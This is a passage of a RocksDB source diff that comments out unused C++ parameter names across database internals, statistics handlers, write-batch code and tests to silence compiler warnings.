[&](void* arg) { opened.store(true); }); + "DBImpl::Open:Opened", [&](void* /*arg*/) { opened.store(true); }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BGWorkCompaction", - [&](void* arg) { ASSERT_TRUE(opened.load()); }); + [&](void* /*arg*/) { ASSERT_TRUE(opened.load()); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); ASSERT_OK(OpenDB()); ASSERT_OK(Verify(0, kNumKeys, FaultInjectionTest::kValExpectFound)); diff --git a/db/file_indexer_test.cc b/db/file_indexer_test.cc index 5cd8c2d2cf6..b424f91eacc 100644 --- a/db/file_indexer_test.cc +++ b/db/file_indexer_test.cc @@ -36,10 +36,10 @@ class IntComparator : public Comparator { const char* Name() const override { return "IntComparator"; } - void FindShortestSeparator(std::string* start, - const Slice& limit) const override {} + void FindShortestSeparator(std::string* /*start*/, + const Slice& /*limit*/) const override {} - void FindShortSuccessor(std::string* key) const override {} + void FindShortSuccessor(std::string* /*key*/) const override {} }; class FileIndexerTest : public testing::Test { diff --git a/db/forward_iterator.cc b/db/forward_iterator.cc index 65fff95956d..affeca01879 100644 --- a/db/forward_iterator.cc +++ b/db/forward_iterator.cc @@ -104,7 +104,7 @@ class LevelIterator : public InternalIterator { file_iter_->Seek(internal_key); valid_ = file_iter_->Valid(); } - void SeekForPrev(const Slice& internal_key) override { + void SeekForPrev(const Slice& /*internal_key*/) override { status_ = 
Status::NotSupported("LevelIterator::SeekForPrev()"); valid_ = false; } diff --git a/db/forward_iterator.h b/db/forward_iterator.h index d4f32cba9fa..8946b7b75e7 100644 --- a/db/forward_iterator.h +++ b/db/forward_iterator.h @@ -55,7 +55,7 @@ class ForwardIterator : public InternalIterator { ColumnFamilyData* cfd, SuperVersion* current_sv = nullptr); virtual ~ForwardIterator(); - void SeekForPrev(const Slice& target) override { + void SeekForPrev(const Slice& /*target*/) override { status_ = Status::NotSupported("ForwardIterator::SeekForPrev()"); valid_ = false; } diff --git a/db/internal_stats.cc b/db/internal_stats.cc index 54723ea91f6..70bd9523fa6 100644 --- a/db/internal_stats.cc +++ b/db/internal_stats.cc @@ -435,7 +435,7 @@ bool InternalStats::GetStringProperty(const DBPropertyInfo& property_info, } bool InternalStats::GetMapProperty(const DBPropertyInfo& property_info, - const Slice& property, + const Slice& /*property*/, std::map* value) { assert(value != nullptr); assert(property_info.handle_map != nullptr); @@ -487,7 +487,7 @@ bool InternalStats::HandleCompressionRatioAtLevelPrefix(std::string* value, return true; } -bool InternalStats::HandleLevelStats(std::string* value, Slice suffix) { +bool InternalStats::HandleLevelStats(std::string* value, Slice /*suffix*/) { char buf[1000]; const auto* vstorage = cfd_->current()->storage_info(); snprintf(buf, sizeof(buf), @@ -519,35 +519,36 @@ bool InternalStats::HandleCFMapStats(std::map* cf_stats) { return true; } -bool InternalStats::HandleCFStats(std::string* value, Slice suffix) { +bool InternalStats::HandleCFStats(std::string* value, Slice /*suffix*/) { DumpCFStats(value); return true; } bool InternalStats::HandleCFStatsNoFileHistogram(std::string* value, - Slice suffix) { + Slice /*suffix*/) { DumpCFStatsNoFileHistogram(value); return true; } -bool InternalStats::HandleCFFileHistogram(std::string* value, Slice suffix) { +bool InternalStats::HandleCFFileHistogram(std::string* value, + Slice /*suffix*/) { DumpCFFileHistogram(value); return true; } -bool InternalStats::HandleDBStats(std::string* value, Slice suffix) { +bool InternalStats::HandleDBStats(std::string* value, Slice /*suffix*/) { DumpDBStats(value); return true; } -bool InternalStats::HandleSsTables(std::string* value, Slice suffix) { +bool InternalStats::HandleSsTables(std::string* value, Slice /*suffix*/) { auto* current = cfd_->current(); *value = current->DebugString(true, true); return true; } bool InternalStats::HandleAggregatedTableProperties(std::string* value, - Slice suffix) { + Slice /*suffix*/) { std::shared_ptr tp; auto s = cfd_->current()->GetAggregatedTableProperties(&tp); if (!s.ok()) { @@ -574,34 +575,34 @@ bool InternalStats::HandleAggregatedTablePropertiesAtLevel(std::string* value, return true; } -bool InternalStats::HandleNumImmutableMemTable(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleNumImmutableMemTable(uint64_t* value, DBImpl* /*db*/, + Version* /*version*/) { *value = cfd_->imm()->NumNotFlushed(); return true; } bool InternalStats::HandleNumImmutableMemTableFlushed(uint64_t* value, - DBImpl* db, - Version* version) { + DBImpl* /*db*/, + Version* /*version*/) { *value = cfd_->imm()->NumFlushed(); return true; } -bool InternalStats::HandleMemTableFlushPending(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleMemTableFlushPending(uint64_t* value, DBImpl* /*db*/, + Version* /*version*/) { // Return number of mem tables that are ready to flush (made immutable) *value = 
(cfd_->imm()->IsFlushPending() ? 1 : 0); return true; } bool InternalStats::HandleNumRunningFlushes(uint64_t* value, DBImpl* db, - Version* version) { + Version* /*version*/) { *value = db->num_running_flushes(); return true; } -bool InternalStats::HandleCompactionPending(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleCompactionPending(uint64_t* value, DBImpl* /*db*/, + Version* /*version*/) { // 1 if the system already determines at least one compaction is needed. // 0 otherwise, const auto* vstorage = cfd_->current()->storage_info(); @@ -610,70 +611,74 @@ bool InternalStats::HandleCompactionPending(uint64_t* value, DBImpl* db, } bool InternalStats::HandleNumRunningCompactions(uint64_t* value, DBImpl* db, - Version* version) { + Version* /*version*/) { *value = db->num_running_compactions_; return true; } -bool InternalStats::HandleBackgroundErrors(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleBackgroundErrors(uint64_t* value, DBImpl* /*db*/, + Version* /*version*/) { // Accumulated number of errors in background flushes or compactions. *value = GetBackgroundErrorCount(); return true; } -bool InternalStats::HandleCurSizeActiveMemTable(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleCurSizeActiveMemTable(uint64_t* value, DBImpl* /*db*/, + Version* /*version*/) { // Current size of the active memtable *value = cfd_->mem()->ApproximateMemoryUsage(); return true; } -bool InternalStats::HandleCurSizeAllMemTables(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleCurSizeAllMemTables(uint64_t* value, DBImpl* /*db*/, + Version* /*version*/) { // Current size of the active memtable + immutable memtables *value = cfd_->mem()->ApproximateMemoryUsage() + cfd_->imm()->ApproximateUnflushedMemTablesMemoryUsage(); return true; } -bool InternalStats::HandleSizeAllMemTables(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleSizeAllMemTables(uint64_t* value, DBImpl* /*db*/, + Version* /*version*/) { *value = cfd_->mem()->ApproximateMemoryUsage() + cfd_->imm()->ApproximateMemoryUsage(); return true; } -bool InternalStats::HandleNumEntriesActiveMemTable(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleNumEntriesActiveMemTable(uint64_t* value, + DBImpl* /*db*/, + Version* /*version*/) { // Current number of entires in the active memtable *value = cfd_->mem()->num_entries(); return true; } -bool InternalStats::HandleNumEntriesImmMemTables(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleNumEntriesImmMemTables(uint64_t* value, + DBImpl* /*db*/, + Version* /*version*/) { // Current number of entries in the immutable memtables *value = cfd_->imm()->current()->GetTotalNumEntries(); return true; } -bool InternalStats::HandleNumDeletesActiveMemTable(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleNumDeletesActiveMemTable(uint64_t* value, + DBImpl* /*db*/, + Version* /*version*/) { // Current number of entires in the active memtable *value = cfd_->mem()->num_deletes(); return true; } -bool InternalStats::HandleNumDeletesImmMemTables(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleNumDeletesImmMemTables(uint64_t* value, + DBImpl* /*db*/, + Version* /*version*/) { // Current number of entries in the immutable memtables *value = cfd_->imm()->current()->GetTotalNumDeletes(); return true; } -bool InternalStats::HandleEstimateNumKeys(uint64_t* value, DBImpl* db, - 
Version* version) { +bool InternalStats::HandleEstimateNumKeys(uint64_t* value, DBImpl* /*db*/, + Version* /*version*/) { // Estimate number of entries in the column family: // Use estimated entries in tables + total entries in memtables. const auto* vstorage = cfd_->current()->storage_info(); @@ -689,77 +694,79 @@ bool InternalStats::HandleEstimateNumKeys(uint64_t* value, DBImpl* db, } bool InternalStats::HandleNumSnapshots(uint64_t* value, DBImpl* db, - Version* version) { + Version* /*version*/) { *value = db->snapshots().count(); return true; } bool InternalStats::HandleOldestSnapshotTime(uint64_t* value, DBImpl* db, - Version* version) { + Version* /*version*/) { *value = static_cast(db->snapshots().GetOldestSnapshotTime()); return true; } -bool InternalStats::HandleNumLiveVersions(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleNumLiveVersions(uint64_t* value, DBImpl* /*db*/, + Version* /*version*/) { *value = cfd_->GetNumLiveVersions(); return true; } -bool InternalStats::HandleCurrentSuperVersionNumber(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleCurrentSuperVersionNumber(uint64_t* value, + DBImpl* /*db*/, + Version* /*version*/) { *value = cfd_->GetSuperVersionNumber(); return true; } bool InternalStats::HandleIsFileDeletionsEnabled(uint64_t* value, DBImpl* db, - Version* version) { + Version* /*version*/) { *value = db->IsFileDeletionsEnabled(); return true; } -bool InternalStats::HandleBaseLevel(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleBaseLevel(uint64_t* value, DBImpl* /*db*/, + Version* /*version*/) { const auto* vstorage = cfd_->current()->storage_info(); *value = vstorage->base_level(); return true; } -bool InternalStats::HandleTotalSstFilesSize(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleTotalSstFilesSize(uint64_t* value, DBImpl* /*db*/, + Version* /*version*/) { *value = cfd_->GetTotalSstFilesSize(); return true; } bool InternalStats::HandleEstimatePendingCompactionBytes(uint64_t* value, - DBImpl* db, - Version* version) { + DBImpl* /*db*/, + Version* /*version*/) { const auto* vstorage = cfd_->current()->storage_info(); *value = vstorage->estimated_compaction_needed_bytes(); return true; } -bool InternalStats::HandleEstimateTableReadersMem(uint64_t* value, DBImpl* db, +bool InternalStats::HandleEstimateTableReadersMem(uint64_t* value, + DBImpl* /*db*/, Version* version) { *value = (version == nullptr) ? 0 : version->GetMemoryUsageByTableReaders(); return true; } -bool InternalStats::HandleEstimateLiveDataSize(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleEstimateLiveDataSize(uint64_t* value, DBImpl* /*db*/, + Version* /*version*/) { const auto* vstorage = cfd_->current()->storage_info(); *value = vstorage->EstimateLiveDataSize(); return true; } bool InternalStats::HandleMinLogNumberToKeep(uint64_t* value, DBImpl* db, - Version* version) { + Version* /*version*/) { *value = db->MinLogNumberToKeep(); return true; } bool InternalStats::HandleActualDelayedWriteRate(uint64_t* value, DBImpl* db, - Version* version) { + Version* /*version*/) { const WriteController& wc = db->write_controller(); if (!wc.NeedsDelay()) { *value = 0; @@ -770,7 +777,7 @@ bool InternalStats::HandleActualDelayedWriteRate(uint64_t* value, DBImpl* db, } bool InternalStats::HandleIsWriteStopped(uint64_t* value, DBImpl* db, - Version* version) { + Version* /*version*/) { *value = db->write_controller().IsStopped() ? 
1 : 0; return true; } diff --git a/db/listener_test.cc b/db/listener_test.cc index 5b5f2266b31..0ab129b1173 100644 --- a/db/listener_test.cc +++ b/db/listener_test.cc @@ -46,11 +46,11 @@ class EventListenerTest : public DBTestBase { }; struct TestPropertiesCollector : public rocksdb::TablePropertiesCollector { - virtual rocksdb::Status AddUserKey(const rocksdb::Slice& key, - const rocksdb::Slice& value, - rocksdb::EntryType type, - rocksdb::SequenceNumber seq, - uint64_t file_size) override { + virtual rocksdb::Status AddUserKey(const rocksdb::Slice& /*key*/, + const rocksdb::Slice& /*value*/, + rocksdb::EntryType /*type*/, + rocksdb::SequenceNumber /*seq*/, + uint64_t /*file_size*/) override { return Status::OK(); } virtual rocksdb::Status Finish( @@ -73,7 +73,7 @@ struct TestPropertiesCollector : public rocksdb::TablePropertiesCollector { class TestPropertiesCollectorFactory : public TablePropertiesCollectorFactory { public: virtual TablePropertiesCollector* CreateTablePropertiesCollector( - TablePropertiesCollectorFactory::Context context) override { + TablePropertiesCollectorFactory::Context /*context*/) override { return new TestPropertiesCollector; } const char* Name() const override { return "TestTablePropertiesCollector"; } @@ -425,7 +425,7 @@ TEST_F(EventListenerTest, DisableBGCompaction) { class TestCompactionReasonListener : public EventListener { public: - void OnCompactionCompleted(DB* db, const CompactionJobInfo& ci) override { + void OnCompactionCompleted(DB* /*db*/, const CompactionJobInfo& ci) override { std::lock_guard lock(mutex_); compaction_reasons_.push_back(ci.compaction_reason); } @@ -807,7 +807,8 @@ class BackgroundErrorListener : public EventListener { public: BackgroundErrorListener(SpecialEnv* env) : env_(env), counter_(0) {} - void OnBackgroundError(BackgroundErrorReason reason, Status* bg_error) override { + void OnBackgroundError(BackgroundErrorReason /*reason*/, + Status* bg_error) override { if (counter_ == 0) { // suppress the first error and disable write-dropping such that a retry // can succeed. 
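BackgroundErrorListener in the hunk above relies on OnBackgroundError() receiving a mutable Status*: a listener that overwrites the error keeps the DB from entering read-only mode so a retry can succeed, per the test's own comment. A hedged sketch of that suppression pattern; the listener class and its counter bookkeeping are illustrative, not the test's exact logic.

#include "rocksdb/listener.h"
#include "rocksdb/status.h"

// Hypothetical listener for illustration.
class SuppressFirstError : public rocksdb::EventListener {
 public:
  void OnBackgroundError(rocksdb::BackgroundErrorReason /*reason*/,
                         rocksdb::Status* bg_error) override {
    if (counter_++ == 0) {
      // Overwriting the status with OK is assumed here to keep the DB out
      // of read-only mode for this one failure.
      *bg_error = rocksdb::Status::OK();
    }
  }

 private:
  int counter_ = 0;
};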
diff --git a/db/malloc_stats.cc b/db/malloc_stats.cc index 7acca65123e..6ea0d5e4744 100644 --- a/db/malloc_stats.cc +++ b/db/malloc_stats.cc @@ -36,7 +36,7 @@ static void GetJemallocStatus(void* mstat_arg, const char* status) { } #endif // ROCKSDB_JEMALLOC -void DumpMallocStats(std::string* stats) { +void DumpMallocStats(std::string* /*stats*/) { #ifdef ROCKSDB_JEMALLOC MallocStatus mstat; const unsigned int kMallocStatusLen = 1000000; diff --git a/db/manual_compaction_test.cc b/db/manual_compaction_test.cc index 039b9080ed3..f31a50b8191 100644 --- a/db/manual_compaction_test.cc +++ b/db/manual_compaction_test.cc @@ -46,9 +46,9 @@ class DestroyAllCompactionFilter : public CompactionFilter { public: DestroyAllCompactionFilter() {} - virtual bool Filter(int level, const Slice& key, const Slice& existing_value, - std::string* new_value, - bool* value_changed) const override { + virtual bool Filter(int /*level*/, const Slice& /*key*/, + const Slice& existing_value, std::string* /*new_value*/, + bool* /*value_changed*/) const override { return existing_value.ToString() == "destroy"; } diff --git a/db/memtable_list.cc b/db/memtable_list.cc index 8f710c2e970..f7e43458026 100644 --- a/db/memtable_list.cc +++ b/db/memtable_list.cc @@ -152,7 +152,7 @@ bool MemTableListVersion::GetFromList(std::list* list, } Status MemTableListVersion::AddRangeTombstoneIterators( - const ReadOptions& read_opts, Arena* arena, + const ReadOptions& read_opts, Arena* /*arena*/, RangeDelAggregator* range_del_agg) { assert(range_del_agg != nullptr); for (auto& m : memlist_) { @@ -298,7 +298,7 @@ void MemTableList::PickMemtablesToFlush(autovector* ret) { } void MemTableList::RollbackMemtableFlush(const autovector& mems, - uint64_t file_number) { + uint64_t /*file_number*/) { AutoThreadOperationStageUpdater stage_updater( ThreadStatus::STAGE_MEMTABLE_ROLLBACK); assert(!mems.empty()); diff --git a/db/merge_test.cc b/db/merge_test.cc index b6582b7a596..c1b0cbfaefb 100644 --- a/db/merge_test.cc +++ b/db/merge_test.cc @@ -504,7 +504,7 @@ void runTest(int argc, const std::string& dbname, const bool use_ttl = false) { } } // namespace -int main(int argc, char *argv[]) { +int main(int argc, char* /*argv*/ []) { //TODO: Make this test like a general rocksdb unit-test rocksdb::port::InstallStackTraceHandler(); runTest(argc, test::TmpDir() + "/merge_testdb"); diff --git a/db/plain_table_db_test.cc b/db/plain_table_db_test.cc index 0b60332e53a..8fae9746d84 100644 --- a/db/plain_table_db_test.cc +++ b/db/plain_table_db_test.cc @@ -327,7 +327,7 @@ class TestPlainTableFactory : public PlainTableFactory { const TableReaderOptions& table_reader_options, unique_ptr&& file, uint64_t file_size, unique_ptr* table, - bool prefetch_index_and_filter_in_cache) const override { + bool /*prefetch_index_and_filter_in_cache*/) const override { TableProperties* props = nullptr; auto s = ReadTableProperties(file.get(), file_size, kPlainTableMagicNumber, diff --git a/db/prefix_test.cc b/db/prefix_test.cc index a4ed201dad1..6ac3ffb5d7b 100644 --- a/db/prefix_test.cc +++ b/db/prefix_test.cc @@ -126,10 +126,10 @@ class TestKeyComparator : public Comparator { return "TestKeyComparator"; } - virtual void FindShortestSeparator(std::string* start, - const Slice& limit) const override {} + virtual void FindShortestSeparator(std::string* /*start*/, + const Slice& /*limit*/) const override {} - virtual void FindShortSuccessor(std::string* key) const override {} + virtual void FindShortSuccessor(std::string* /*key*/) const override {} }; namespace { diff --git 
a/db/table_cache.cc b/db/table_cache.cc index 4dc56935fbc..60092ff610c 100644 --- a/db/table_cache.cc +++ b/db/table_cache.cc @@ -30,7 +30,7 @@ namespace rocksdb { namespace { template -static void DeleteEntry(const Slice& key, void* value) { +static void DeleteEntry(const Slice& /*key*/, void* value) { T* typed_value = reinterpret_cast(value); delete typed_value; } @@ -41,7 +41,7 @@ static void UnrefEntry(void* arg1, void* arg2) { cache->Release(h); } -static void DeleteTableReader(void* arg1, void* arg2) { +static void DeleteTableReader(void* arg1, void* /*arg2*/) { TableReader* table_reader = reinterpret_cast(arg1); delete table_reader; } diff --git a/db/table_properties_collector.cc b/db/table_properties_collector.cc index a1f4dba97bb..ed9f223cdda 100644 --- a/db/table_properties_collector.cc +++ b/db/table_properties_collector.cc @@ -12,8 +12,8 @@ namespace rocksdb { Status InternalKeyPropertiesCollector::InternalAdd(const Slice& key, - const Slice& value, - uint64_t file_size) { + const Slice& /*value*/, + uint64_t /*file_size*/) { ParsedInternalKey ikey; if (!ParseInternalKey(key, &ikey)) { return Status::InvalidArgument("Invalid internal key"); diff --git a/db/table_properties_collector.h b/db/table_properties_collector.h index d8cd75689d5..7216ec3190f 100644 --- a/db/table_properties_collector.h +++ b/db/table_properties_collector.h @@ -73,7 +73,7 @@ class InternalKeyPropertiesCollectorFactory : public IntTblPropCollectorFactory { public: virtual IntTblPropCollector* CreateIntTblPropCollector( - uint32_t column_family_id) override { + uint32_t /*column_family_id*/) override { return new InternalKeyPropertiesCollector(); } diff --git a/db/table_properties_collector_test.cc b/db/table_properties_collector_test.cc index 66c66c02531..bf382b4fddc 100644 --- a/db/table_properties_collector_test.cc +++ b/db/table_properties_collector_test.cc @@ -82,8 +82,9 @@ class RegularKeysStartWithA: public TablePropertiesCollector { return Status::OK(); } - Status AddUserKey(const Slice& user_key, const Slice& value, EntryType type, - SequenceNumber seq, uint64_t file_size) override { + Status AddUserKey(const Slice& user_key, const Slice& /*value*/, + EntryType type, SequenceNumber /*seq*/, + uint64_t file_size) override { // simply asssume all user keys are not empty. if (user_key.data()[0] == 'A') { ++count_; @@ -133,7 +134,7 @@ class RegularKeysStartWithABackwardCompatible return Status::OK(); } - Status Add(const Slice& user_key, const Slice& value) override { + Status Add(const Slice& user_key, const Slice& /*value*/) override { // simply asssume all user keys are not empty. if (user_key.data()[0] == 'A') { ++count_; @@ -161,8 +162,8 @@ class RegularKeysStartWithAInternal : public IntTblPropCollector { return Status::OK(); } - Status InternalAdd(const Slice& user_key, const Slice& value, - uint64_t file_size) override { + Status InternalAdd(const Slice& user_key, const Slice& /*value*/, + uint64_t /*file_size*/) override { // simply asssume all user keys are not empty. 
if (user_key.data()[0] == 'A') { ++count_; @@ -193,7 +194,7 @@ class RegularKeysStartWithAFactory : public IntTblPropCollectorFactory, } } virtual IntTblPropCollector* CreateIntTblPropCollector( - uint32_t column_family_id) override { + uint32_t /*column_family_id*/) override { return new RegularKeysStartWithAInternal(); } const char* Name() const override { return "RegularKeysStartWithA"; } @@ -203,7 +204,7 @@ class RegularKeysStartWithAFactory : public IntTblPropCollectorFactory, class FlushBlockEveryThreePolicy : public FlushBlockPolicy { public: - virtual bool Update(const Slice& key, const Slice& value) override { + virtual bool Update(const Slice& /*key*/, const Slice& /*value*/) override { return (++count_ % 3U == 0); } @@ -220,8 +221,8 @@ class FlushBlockEveryThreePolicyFactory : public FlushBlockPolicyFactory { } FlushBlockPolicy* NewFlushBlockPolicy( - const BlockBasedTableOptions& table_options, - const BlockBuilder& data_block_builder) const override { + const BlockBasedTableOptions& /*table_options*/, + const BlockBuilder& /*data_block_builder*/) const override { return new FlushBlockEveryThreePolicy; } }; diff --git a/db/version_builder.cc b/db/version_builder.cc index bab8d11f5a5..48264d4d704 100644 --- a/db/version_builder.cc +++ b/db/version_builder.cc @@ -185,7 +185,7 @@ class VersionBuilder::Rep { } } - void CheckConsistencyForDeletes(VersionEdit* edit, uint64_t number, + void CheckConsistencyForDeletes(VersionEdit* /*edit*/, uint64_t number, int level) { #ifdef NDEBUG if (!base_vstorage_->force_consistency_checks()) { diff --git a/db/version_edit.cc b/db/version_edit.cc index b01f7bbdf70..ebfc10584c9 100644 --- a/db/version_edit.cc +++ b/db/version_edit.cc @@ -198,7 +198,7 @@ static bool GetInternalKey(Slice* input, InternalKey* dst) { } } -bool VersionEdit::GetLevel(Slice* input, int* level, const char** msg) { +bool VersionEdit::GetLevel(Slice* input, int* level, const char** /*msg*/) { uint32_t v; if (GetVarint32(input, &v)) { *level = v; diff --git a/db/version_set.cc b/db/version_set.cc index 0069d86c1dd..aea3a62fad6 100644 --- a/db/version_set.cc +++ b/db/version_set.cc @@ -528,9 +528,7 @@ class LevelFileIteratorState : public TwoLevelIteratorState { for_compaction_, nullptr /* arena */, skip_filters_, level_); } - bool PrefixMayMatch(const Slice& internal_key) override { - return true; - } + bool PrefixMayMatch(const Slice& /*internal_key*/) override { return true; } bool KeyReachedUpperBound(const Slice& internal_key) override { return read_options_.iterate_upper_bound != nullptr && @@ -2656,7 +2654,7 @@ void VersionSet::LogAndApplyCFHelper(VersionEdit* edit) { } void VersionSet::LogAndApplyHelper(ColumnFamilyData* cfd, - VersionBuilder* builder, Version* v, + VersionBuilder* builder, Version* /*v*/, VersionEdit* edit, InstrumentedMutex* mu) { mu->AssertHeld(); assert(!edit->IsColumnFamilyManipulation()); diff --git a/db/version_set.h b/db/version_set.h index 5a1f8d07d64..1e60098a63b 100644 --- a/db/version_set.h +++ b/db/version_set.h @@ -792,7 +792,7 @@ class VersionSet { struct LogReporter : public log::Reader::Reporter { Status* status; - virtual void Corruption(size_t bytes, const Status& s) override { + virtual void Corruption(size_t /*bytes*/, const Status& s) override { if (this->status->ok()) *this->status = s; } }; diff --git a/db/version_set_test.cc b/db/version_set_test.cc index 625d4592264..090e074cf0d 100644 --- a/db/version_set_test.cc +++ b/db/version_set_test.cc @@ -76,7 +76,9 @@ class CountingLogger : public Logger { public: CountingLogger() : 
log_count(0) {} using Logger::Logv; - virtual void Logv(const char* format, va_list ap) override { log_count++; } + virtual void Logv(const char* /*format*/, va_list /*ap*/) override { + log_count++; + } int log_count; }; diff --git a/db/wal_manager_test.cc b/db/wal_manager_test.cc index 9f5cf273d24..b0d8beee8a6 100644 --- a/db/wal_manager_test.cc +++ b/db/wal_manager_test.cc @@ -72,7 +72,7 @@ class WalManagerTest : public testing::Test { } // NOT thread safe - void RollTheLog(bool archived) { + void RollTheLog(bool /*archived*/) { current_log_number_++; std::string fname = ArchivedLogFileName(dbname_, current_log_number_); unique_ptr file; diff --git a/db/write_batch.cc b/db/write_batch.cc index 91be9a0dfa6..042be5ab2f3 100644 --- a/db/write_batch.cc +++ b/db/write_batch.cc @@ -171,7 +171,7 @@ WriteBatch::~WriteBatch() { delete save_points_; } WriteBatch::Handler::~Handler() { } -void WriteBatch::Handler::LogData(const Slice& blob) { +void WriteBatch::Handler::LogData(const Slice& /*blob*/) { // If the user has not specified something to do with blobs, then we ignore // them. } @@ -469,7 +469,7 @@ void WriteBatchInternal::SetSequence(WriteBatch* b, SequenceNumber seq) { EncodeFixed64(&b->rep_[0], seq); } -size_t WriteBatchInternal::GetFirstOffset(WriteBatch* b) { +size_t WriteBatchInternal::GetFirstOffset(WriteBatch* /*b*/) { return WriteBatchInternal::kHeader; } @@ -1003,7 +1003,7 @@ class MemTableInserter : public WriteBatch::Handler { return Status::OK(); } - Status DeleteImpl(uint32_t column_family_id, const Slice& key, + Status DeleteImpl(uint32_t /*column_family_id*/, const Slice& key, const Slice& value, ValueType delete_type) { MemTable* mem = cf_mems_->GetMemTable(); mem->Add(sequence_, delete_type, key, value, concurrent_memtable_writes_, diff --git a/db/write_batch_test.cc b/db/write_batch_test.cc index 4fd156d9bae..6f119634539 100644 --- a/db/write_batch_test.cc +++ b/db/write_batch_test.cc @@ -434,7 +434,7 @@ TEST_F(WriteBatchTest, DISABLED_ManyUpdates) { struct NoopHandler : public WriteBatch::Handler { uint32_t num_seen = 0; char expected_char = 'A'; - virtual Status PutCF(uint32_t column_family_id, const Slice& key, + virtual Status PutCF(uint32_t /*column_family_id*/, const Slice& key, const Slice& value) override { EXPECT_EQ(kKeyValueSize, key.size()); EXPECT_EQ(kKeyValueSize, value.size()); @@ -449,22 +449,22 @@ TEST_F(WriteBatchTest, DISABLED_ManyUpdates) { ++num_seen; return Status::OK(); } - virtual Status DeleteCF(uint32_t column_family_id, - const Slice& key) override { + virtual Status DeleteCF(uint32_t /*column_family_id*/, + const Slice& /*key*/) override { ADD_FAILURE(); return Status::OK(); } - virtual Status SingleDeleteCF(uint32_t column_family_id, - const Slice& key) override { + virtual Status SingleDeleteCF(uint32_t /*column_family_id*/, + const Slice& /*key*/) override { ADD_FAILURE(); return Status::OK(); } - virtual Status MergeCF(uint32_t column_family_id, const Slice& key, - const Slice& value) override { + virtual Status MergeCF(uint32_t /*column_family_id*/, const Slice& /*key*/, + const Slice& /*value*/) override { ADD_FAILURE(); return Status::OK(); } - virtual void LogData(const Slice& blob) override { ADD_FAILURE(); } + virtual void LogData(const Slice& /*blob*/) override { ADD_FAILURE(); } virtual bool Continue() override { return num_seen < kNumUpdates; } } handler; @@ -489,7 +489,7 @@ TEST_F(WriteBatchTest, DISABLED_LargeKeyValue) { struct NoopHandler : public WriteBatch::Handler { int num_seen = 0; - virtual Status PutCF(uint32_t 
column_family_id, const Slice& key, + virtual Status PutCF(uint32_t /*column_family_id*/, const Slice& key, const Slice& value) override { EXPECT_EQ(kKeyValueSize, key.size()); EXPECT_EQ(kKeyValueSize, value.size()); @@ -500,22 +500,22 @@ TEST_F(WriteBatchTest, DISABLED_LargeKeyValue) { ++num_seen; return Status::OK(); } - virtual Status DeleteCF(uint32_t column_family_id, - const Slice& key) override { + virtual Status DeleteCF(uint32_t /*column_family_id*/, + const Slice& /*key*/) override { ADD_FAILURE(); return Status::OK(); } - virtual Status SingleDeleteCF(uint32_t column_family_id, - const Slice& key) override { + virtual Status SingleDeleteCF(uint32_t /*column_family_id*/, + const Slice& /*key*/) override { ADD_FAILURE(); return Status::OK(); } - virtual Status MergeCF(uint32_t column_family_id, const Slice& key, - const Slice& value) override { + virtual Status MergeCF(uint32_t /*column_family_id*/, const Slice& /*key*/, + const Slice& /*value*/) override { ADD_FAILURE(); return Status::OK(); } - virtual void LogData(const Slice& blob) override { ADD_FAILURE(); } + virtual void LogData(const Slice& /*blob*/) override { ADD_FAILURE(); } virtual bool Continue() override { return num_seen < 2; } } handler; diff --git a/db/write_callback_test.cc b/db/write_callback_test.cc index 9edf1c1581e..41488b8c76d 100644 --- a/db/write_callback_test.cc +++ b/db/write_callback_test.cc @@ -55,9 +55,7 @@ class WriteCallbackTestWriteCallback1 : public WriteCallback { class WriteCallbackTestWriteCallback2 : public WriteCallback { public: - Status Callback(DB *db) override { - return Status::Busy(); - } + Status Callback(DB* /*db*/) override { return Status::Busy(); } bool AllowWriteBatching() override { return true; } }; @@ -75,7 +73,7 @@ class MockWriteCallback : public WriteCallback { was_called_.store(other.was_called_.load()); } - Status Callback(DB* db) override { + Status Callback(DB* /*db*/) override { was_called_.store(true); if (should_fail_) { return Status::Busy(); diff --git a/db/write_thread.cc b/db/write_thread.cc index 7063469967b..6d466e4fd23 100644 --- a/db/write_thread.cc +++ b/db/write_thread.cc @@ -434,7 +434,8 @@ void WriteThread::EnterAsMemTableWriter(Writer* leader, last_writer->sequence + WriteBatchInternal::Count(last_writer->batch) - 1; } -void WriteThread::ExitAsMemTableWriter(Writer* self, WriteGroup& write_group) { +void WriteThread::ExitAsMemTableWriter(Writer* /*self*/, + WriteGroup& write_group) { Writer* leader = write_group.leader; Writer* last_writer = write_group.last_writer; diff --git a/env/env_encryption.cc b/env/env_encryption.cc index 6b688a66020..ff7f0810719 100644 --- a/env/env_encryption.cc +++ b/env/env_encryption.cc @@ -844,7 +844,9 @@ static void decodeCTRParameters(const char *prefix, size_t blockSize, uint64_t & // CreateNewPrefix initialized an allocated block of prefix memory // for a new file. -Status CTREncryptionProvider::CreateNewPrefix(const std::string& fname, char *prefix, size_t prefixLength) { +Status CTREncryptionProvider::CreateNewPrefix(const std::string& /*fname*/, + char* prefix, + size_t prefixLength) { // Create & seed rnd. Random rnd((uint32_t)Env::Default()->NowMicros()); // Fill entire prefix block with random values. @@ -873,7 +875,9 @@ Status CTREncryptionProvider::CreateNewPrefix(const std::string& fname, char *pr // in plain text. // Returns the amount of space (starting from the start of the prefix) // that has been initialized. 
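The NoopHandler hunks above exercise the public WriteBatch::Handler pattern: WriteBatch::Iterate() replays each record in the batch into the matching typed callback (PutCF, DeleteCF, MergeCF, LogData). A minimal sketch of that pattern; the handler struct is hypothetical, and only the PutCF/LogData callbacks shown in the hunks are assumed.

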